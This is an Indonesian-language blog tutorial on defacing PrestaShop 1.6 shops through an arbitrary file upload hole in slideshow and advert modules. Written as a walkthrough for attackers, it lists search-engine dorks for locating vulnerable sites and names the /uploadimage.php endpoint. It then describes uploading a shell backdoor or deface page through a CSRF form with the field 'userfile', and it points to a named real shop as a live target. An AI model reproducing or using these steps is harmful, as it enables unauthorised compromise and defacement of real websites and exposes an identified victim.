search
CARA DEFACE METODE RESPONSIVE PRESTASHOP 1.6 ARBITRARY FILE UPLOAD
CARA DEFACE METODE RESPONSIVE PRESTASHOP 1.6 ARBITRARY FILE UPLOAD

CARA DEFACE METODE RESPONSIVE PRESTASHOP 1.6 ARBITRARY FILE UPLOAD

By Saturday, December 8, 2018 Comment Edit

Assalamualaikum Wr Wb
kembali lagi bersama saya yang gans ini 😁
kali ini saya akan memberikan tutorial deface metode
"Responsive Prestashop 1.6 Arbitrary File Upload"

oke langsung gaskeunn...

Bahan

1. Dork :
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
inurl:"/modules/columnadverts/"

2. Exploit : /uploadimage.php

3. CSRF :  CSRF ONLINE

4. Shell backdoor atau script deface

5. Sabar 😂

- dorking dengan dork diatas tapi disini saya ada live target "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/"
- lalu masukan exploit nya jadi seperti ini
"http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/uploadimage.php"
- jika ada tulisan error seperti ini
- itu tandanya vuln tinggal kita masukan sitenya ke CSRF seperti gambar di
bawah ini, dengan POSTFILE : userfile  

 - lalu klik submit, setelah itu pilih file yang ingin kalian upload lalu klik upload 

-jika berhasil maka akan muncul "success:namafilekalian.extensi" seperti di gambar di bawah
- lalu tinggal kita akses, dimana aksesnya ??, yaitu di
  "/modules/namamodules/slides/filekalian"
- seperti ini "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/slides/luv.gif"
- dan yap kita sudah berhasil

ok mungkin cukup sekian tutorial dari saya 
see you on the next tutorial 

0 Response to "CARA DEFACE METODE RESPONSIVE PRESTASHOP 1.6 ARBITRARY FILE UPLOAD"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel